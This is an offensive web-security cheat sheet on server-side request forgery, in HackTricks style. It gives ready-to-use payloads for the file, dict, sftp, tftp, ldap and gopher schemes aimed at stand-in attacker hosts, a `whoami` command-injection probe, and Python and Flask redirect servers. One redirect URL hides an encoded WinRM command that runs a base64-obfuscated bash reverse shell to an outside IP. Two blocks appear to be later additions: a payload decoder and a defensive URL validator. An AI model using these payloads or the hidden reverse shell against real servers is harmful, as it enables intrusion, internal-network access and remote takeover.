SSRF (Server Side Request Forgery)
Use Trickest to easily build and automate workflows powered by the world's most advanced community tools.
Get Access Today:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? Or do you want to have access to the latest version of PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
- Discover The PEASS Family, our collection of exclusive NFTs
- Get the official PEASS & HackTricks swag
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.
- Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.
Server-Side Request Forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing. (From here)
Capture SSRF
The first thing you need to do is to capture an SSRF interaction provoked by you. To capture an HTTP or DNS interaction you can use tools such as:
- Burpcollab
- pingb
- canarytokens
- interactsh
- http://webhook.site
- https://github.com/teknogeek/ssrf-sheriff
Whitelisted domain bypass
Usually you will find that the SSRF only works in certain whitelisted domains or URLs. In the following page you have a compilation of techniques to try to bypass that whitelist:
{% content-ref url="url-format-bypass.md" %} url-format-bypass.md {% endcontent-ref %}
Bypass via open redirect
If the server is correctly protected you could bypass all the restrictions by exploiting an open redirect inside the web page. Because the web page will allow SSRF to the same domain and will probably follow redirects, you can exploit the open redirect to make the server access any internal resource.
Read more here: https://portswigger.net/web-security/ssrf
Protocols
file://
file:///etc/passwd
dict://
The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
ssrf.php?url=dict://attacker:11111/
SFTP://
A network protocol used for secure file transfer over Secure Shell
ssrf.php?url=sftp://evil.com:11111/
TFTP://
Trivial File Transfer Protocol, works over UDP
ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET
LDAP://
Lightweight Directory Access Protocol. It is an application protocol used over an IP network to manage and access the distributed directory information service.
ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
Gopher://
Using this protocol you can specify the IP, port and bytes you want the server to send. Then, you can basically exploit an SSRF to communicate with any TCP server (but you need to know how to talk to the service first).
Fortunately, you can use Gopherus to create payloads for several services. Additionally, remote-method-guesser can be used to create gopher payloads for Java RMI services.
Gopher smtp
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
will make a request like
HELO localhost
MAIL FROM:<hacker@site.com>
RCPT TO:<victim@site.com>
DATA
From: [Hacker] <hacker@site.com>
To: <victime@site.com>
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: AH AH AH

You didn't say the magic word !
.
QUIT
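To see exactly which bytes a gopher:// SSRF makes the server write to the socket (useful when triaging a logged payload), here is an added decoder that is not part of the original page. It applies the two decoding layers to the SMTP payload above and assumes a curl-style client, which drops the item-type character and terminates the selector with CRLF.

```python
from urllib.parse import unquote, unquote_to_bytes, urlsplit

# The Gopher SMTP payload from this page, exactly as it is placed in ssrf.php?url=... (double-encoded).
SMTP_PAYLOAD = (
    "gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250a"
    "RCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E"
    "%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26"
    "%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic"
    "%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a"
)


def gopher_request_bytes(url, from_query_param=False):
    """Return (host, port, raw_bytes): what a curl-style gopher client writes to the TCP socket.

    Layer 1 (optional): the URL travelled inside another URL's query string, so the web app
    percent-decodes it once (%250d%250a -> %0d%0a).
    Layer 2: the gopher client drops the first path character (the Gopher item type, '_' or
    'x' in this page's payloads), percent-decodes the remaining selector and appends CRLF.
    """
    if from_query_param:
        url = unquote(url)
    parts = urlsplit(url)
    if parts.scheme.lower() != "gopher":
        raise ValueError("not a gopher:// URL")
    port = parts.port if parts.port is not None else 70   # 70 is the Gopher default port
    pieces = url.split("/", 3)               # ['gopher:', '', 'host:port', '<type><selector>']
    selector = pieces[3][1:] if len(pieces) == 4 and pieces[3] else ""
    return parts.hostname, port, unquote_to_bytes(selector) + b"\r\n"


if __name__ == "__main__":
    host, port, raw = gopher_request_bytes(SMTP_PAYLOAD, from_query_param=True)
    print("to %s:%d" % (host, port))
    print(raw.decode())
```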
Gopher HTTP
Gopher is a protocol that allows the retrieval of documents over the Internet. It was popular in the early days of the web but has since been largely replaced by HTTP; however, Gopher is still supported by some servers and can be used in SSRF attacks.
SSRF (Server-Side Request Forgery) is a vulnerability that allows an attacker to make the server issue requests to other internal or external resources. By exploiting SSRF, an attacker can potentially access sensitive information, perform port scanning, or even pivot to other systems within the network.
In the context of SSRF, Gopher can be used as a transport protocol to bypass restrictions and access internal resources. The basic idea is to craft a Gopher URL that points to the desired resource and then make the server request that URL.
To perform a Gopher SSRF attack, follow these steps:
- Identify the SSRF vulnerability in the target application.
- Craft a Gopher URL that points to the desired resource, following the format gopher://<attacker-controlled-IP>:<attacker-controlled-port>/
- Send the crafted Gopher URL as a request to the server.
- Analyze the server's response to determine whether the attack was successful.
Note that Gopher SSRF attacks may not work in all scenarios, as many servers have disabled or restricted Gopher support. Additionally, the success of the attack depends on the specific implementation of the server and the security measures in place.
To mitigate the risk of Gopher SSRF attacks, it is recommended to:
- Implement proper input validation and sanitization to prevent SSRF vulnerabilities.
- Disable or restrict Gopher support on servers that do not require it.
- Regularly update and patch server software to address any known vulnerabilities.
By understanding the Gopher protocol and its potential for SSRF attacks, you can better protect your applications and systems from exploitation.
#For new lines you can use %0A, %0D%0A
gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body
Gopher SMTP - Back connect to 1337
{% code title="redirect.php" %}
<?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>
{% endcode %}
Now query it.
https://example.com/?q=http://evil.com/redirect.php
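The protocol list above and the open-redirect / redirect.php bypasses come down to the same defensive checks: allow only http(s), refuse userinfo, refuse hosts that resolve to non-public addresses, and re-validate every redirect hop instead of letting the HTTP client follow redirects on its own. The following is an added example, not code from the page or from HackTricks; `resolve`, `check_url` and `fetch_checked` are hypothetical names, and `fetch` is a caller-supplied function that performs one request without following redirects.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
MAX_REDIRECTS = 3
REDIRECT_CODES = {301, 302, 303, 307, 308}


def resolve(host):
    """Default resolver (hypothetical helper): every address the host currently resolves to.
    Against DNS rebinding the client must also connect to exactly these addresses, not re-resolve."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def check_url(url, resolver=resolve):
    """Return (ok, reason). Rejects every scheme except http(s), so file://, dict://, sftp://,
    tftp://, ldap:// and gopher:// never reach a client; rejects URLs carrying userinfo; and
    rejects hosts with any non-global address (loopback, RFC 1918, 169.254.0.0/16, ...)."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed: %r" % parts.scheme
    if not parts.hostname:
        return False, "no host"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo not allowed"
    try:
        addrs = resolver(parts.hostname)
    except OSError:
        return False, "host does not resolve"
    for addr in addrs:
        if not ipaddress.ip_address(addr).is_global:
            return False, "%s resolves to non-public address %s" % (parts.hostname, addr)
    return True, "ok"


def fetch_checked(url, fetch, resolver=resolve):
    """Follow redirects by hand and re-run check_url on every hop, so an open redirect (or a
    redirect.php answering 'Location: gopher://...') on an allowed host cannot send the server
    somewhere check_url would have refused. fetch(url) must not follow redirects itself and
    returns (status, location_header_or_None, body)."""
    for _ in range(MAX_REDIRECTS + 1):
        ok, reason = check_url(url, resolver)
        if not ok:
            raise ValueError("blocked %s: %s" % (url, reason))
        status, location, body = fetch(url)
        if status in REDIRECT_CODES and location:
            url = location
            continue
        return body
    raise ValueError("too many redirects")
```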
SMTP
From https://twitter.com/har1sec/status/1182255952055164929:
- Connect with SSRF on smtp localhost:25
- From the first line get the internal domain name 220 http://blabla.internaldomain.com ESMTP Sendmail
- Search http://internaldomain.com on github, find subdomains
- Connect
Curl URL globbing - WAF bypass
If the SSRF is executed by curl, curl has a feature called URL globbing that could be useful to bypass WAFs. For example, in this writeup you can find an example of path traversal via the file protocol:
file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}
Capture SSRF request
- Burp Collaborator
- http://requestrepo.com/
- https://app.interactsh.com/
- https://github.com/stolenusername/cowitness
SSRF via Referrer header
Some applications employ server-side analytics software that tracks visitors. This software often logs the Referer header in requests, since this is of particular interest for tracking incoming links. Often the analytics software will actually visit any third-party URL that appears in the Referer header. This is typically done to analyze the contents of referring sites, including the anchor text used in the incoming links. As a result, the Referer header often represents a fruitful attack surface for SSRF vulnerabilities.
To discover this kind of "hidden" vulnerability you could use the Burp plugin "Collaborator Everywhere".
SSRF via SNI data from certificate
The simplest misconfiguration that would allow you to connect to an arbitrary backend would look like this:
```nginx
stream {
    server {
        listen 443;
        resolver 127.0.0.11;
        proxy_pass $ssl_preread_server_name:443;
        ssl_preread on;
    }
}
```
Here the value of the SNI field is used directly as the address of the backend.
With this insecure setup, we can exploit the SSRF vulnerability just by specifying the desired IP or domain name in the SNI field. For example, the following command would force Nginx to connect to internal.host.com:
openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf
Upload files using Wget
SSRF with command injection
It might be worth trying a payload like: url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami`
PDF rendering
If the web page automatically creates a PDF with some information you have provided, you can insert some JS that will be executed by the PDF creator itself (the server) while creating the PDF, and you will be able to abuse an SSRF. Find more information here.
From SSRF to DoS
Create several sessions and try to download heavy files exploiting the SSRF from the sessions.
SSRF PHP functions
{% content-ref url="../../network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md" %} php-ssrf.md {% endcontent-ref %}
SSRF redirect to Gopher
For some exploitations you might need to send a redirect response (potentially to use a different protocol such as gopher). Here you have different python codes to respond with a redirect:
```python
# First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl


class MainHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        print("GET")
        self.send_response(301)
        # Redirect the SSRF client to a gopher:// URL carrying the raw (percent-encoded) request bytes
        self.send_header("Location", "gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%31%30%2e%31%31%2e%31%31%37%3a%35%39%38%36%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%70%79%74%68%6f%6e%2d%72%65%71%75%65%73%74%73%2f%32%2e%32%35%2e%31%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%3a%20%2a%2f%2a%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%6f%61%70%2b%78%6d%6c%3b%63%68%61%72%73%65%74%3d%55%54%46%2d%38%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%37%32%38%0d%0a%0d%0a%3c%73%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%33%2f%30%35%2f%73%6f%61%70%2d%65%6e%76%65%6c%6f%70%65%22%20%78%6d%6c%6e%73%3a%61%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%22%20%78%6d%6c%6e%73%3a%68%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%69%6e%64%6f%77%73%2f%73%68%65%6c%6c%22%20%78%6d%6c%6e%73%3a%6e%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%39%2f%65%6e%75%6d%65%72%61%74%69%6f%6e%22%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%77%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%78%73%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%4d%4c%53%63%68%65%6d%61%22%3e%0a%20%20%20%3c%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%20%20%20%3c%61%3a%54%6f%3e%48%54%54%50%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%3a%35%39%38%36%2f%77%73%6d%61%6e%2f%3c%2f%61%3a%54%6f%3e%0a%20%20%20%20%20%20%3c%77%3a%52%65%73%6f%75%72%63%65%55%52%49%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%3c%2f%77%3a%52%65%73%6f%75%72%63%65%55%52%49%3e%0a%20%20%20%20%20%20%3c%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%20%20%20%3c%61%3a%41%64%64%72%65%73%73%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%2f%72%6f%6c%65%2f%61%6e%6f%6e%79%6d%6f%75%73%3c%2f%61%3a%41%64%64%72%65%73%73%3e%0a%20%20%20%20%20%20%3c%2f%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%3c%61%3a%41%63%74%69%6f%6e%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%2f%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%3c%2f%61%3a%41%63%74%69%6f%6e%3e%0a%20%20%20%20%20%20%3c%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%31%30%32%34%30%30%3c%2f%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%3e%0a%20%20%20%20%20%20%3c%61%3a%4d%65%73%73%61%67%65%49%44%3e%75%75%69%64%3a%30%41%42%35%38%30%38%37%2d%43%32%43%33%2d%30%30%30%35%2d%30%30%30%30%2d%30%30%30%30%30%30%30%31%30%30%30%30%3c%2f%61%3a%4d%65%73%73%61%67%65%49%44%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%50%54%31%4d%33%30%53%3c%2f%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%77%3a%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%70%3a%44%61%74%61%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%74%69%6f%6e%53%65%74%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%20%4e%61%6d%65%3d%22%5f%5f%63%69%6d%6e%61%6d%65%73%70%61%63%65%22%3e%72%6f%6f%74%2f%73%63%78%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%3e%0a%20%20%20%20%20%20%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%3c%2f%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%3c%73%3a%42%6f%64%79%3e%0a%20%20%20%20%20%20%3c%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%22%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%63%6f%6d%6d%61%6e%64%3e%65%63%68%6f%20%2d%6e%20%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%43%34%78%4d%53%38%35%4d%44%41%78%49%44%41%2b%4a%6a%45%3d%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%3c%2f%70%3a%63%6f%6d%6d%61%6e%64%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%74%69%6d%65%6f%75%74%3e%30%3c%2f%70%3a%74%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%2f%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%3e%0a%20%20%20%3c%2f%73%3a%42%6f%64%79%3e%0a%3c%2f%73%3a%45%6e%76%65%6c%6f%70%65%3e%0a")
        self.end_headers()


httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
# ssl.wrap_socket() was removed in Python 3.12; an SSLContext does the same job
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(certfile="server.pem")
httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()
```
```python
from flask import Flask, redirect

app = Flask(__name__)


@app.route('/')
def root():
    # Same idea with Flask: answer every request with a 301 to a gopher:// URL
    return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301)


if __name__ == "__main__":
    # 'adhoc' generates a self-signed certificate on the fly (needs the cryptography package)
    app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
```
DNS Rebinding CORS/SOP bypass
If you are having problems exfiltrating content from a local IP because of CORS/SOP, DNS Rebinding can be used to bypass that limitation:
{% content-ref url="../cors-bypass.md" %} cors-bypass.md {% endcontent-ref %}
Automated DNS Rebinding
Singularity of Origin is a tool to perform DNS rebinding attacks. It includes the necessary components to rebind the IP address of the attack server's DNS name to the target machine's IP address and to serve attack payloads to exploit vulnerable software on the target machine.
Check out also the publicly running server at http://rebind.it/singularity.html
DNS Rebinding + TLS Session ID/Session ticket
Requirements:
- SSRF
- Outbound TLS sessions
- Stuff on local ports
Attack:
- Ask the user/bot to access a domain controlled by the attacker
- The TTL of the DNS is 0 sec (so the victim will check the IP of the domain again soon)
- A TLS connection is created between the victim and the attacker's domain. The attacker introduces the payload inside the Session ID or Session Ticket.
- The domain will start an infinite loop of redirects against itself. The goal of this is to make the user/bot access the domain until it performs again a DNS request of the domain.
- In the DNS request a private IP address is given now (127.0.0.1 for example)
- The user/bot will try to re-establish the TLS connection and in order to do so it will send the Session ID/Ticket ID (which contains the attacker's payload). Congratulations, you managed to ask the user/bot to attack itself.
Note that during this attack, if you want to attack localhost:11211 (memcache) you need to make the victim establish the initial connection with www.attacker.com:11211 (the port must always be the same).
To perform this attack you can use the tool: https://github.com/jmdx/TLS-poison/
For more information take a look at the talk where this attack is explained: https://www.youtube.com/watch?v=qGpAJxfADjo&ab_channel=DEFCONConference
Blind SSRF
The difference between a blind SSRF and a non-blind one is that in the blind one you cannot see the response of the SSRF request. Then, it is more difficult to exploit because you will only be able to exploit well-known vulnerabilities.
Time based SSRF
Checking the time of the responses from the server it might be possible to know if a resource exists or not (maybe it takes more time to access an existing resource than one that doesn't exist)
Cloud SSRF Exploitation
If you find an SSRF vulnerability in a machine running inside a cloud environment you might be able to obtain interesting information about the cloud environment and even credentials:
{% content-ref url="cloud-ssrf.md" %} cloud-ssrf.md {% endcontent-ref %}
SSRF Vulnerable Platforms
Several known platforms contain or have contained SSRF vulnerabilities, check them in:
{% content-ref url="ssrf-vulnerable-platforms.md" %} ssrf-vulnerable-platforms.md {% endcontent-ref %}
Tools
SSRFMap
Tool to detect and exploit SSRF vulnerabilities
Gopherus
This tool generates Gopher payloads for:
- MySQL
- PostgreSQL
- FastCGI
- Redis
- Zabbix
- Memcache
remote-method-guesser
_remote-method-guesser_ is a _Java RMI_ vulnerability scanner that supports attack operations for most common _Java RMI_ vulnerabilities. Most of the available operations support the --ssrf option, to generate an _SSRF_ payload for the requested operation. Together with the --gopher option, ready-to-use _gopher_ payloads can be generated directly.
SSRF Proxy
SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP traffic through HTTP servers vulnerable to Server-Side Request Forgery (SSRF).
Practice
{% embed url="https://github.com/incredibleindishell/SSRF_Vulnerable_Lab" %}
References
- https://medium.com/@pravinponnusamy/ssrf-payloads-f09b2a86a8b4
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery
- https://www.invicti.com/blog/web-security/ssrf-vulnerabilities-caused-by-sni-proxy-misconfigurations/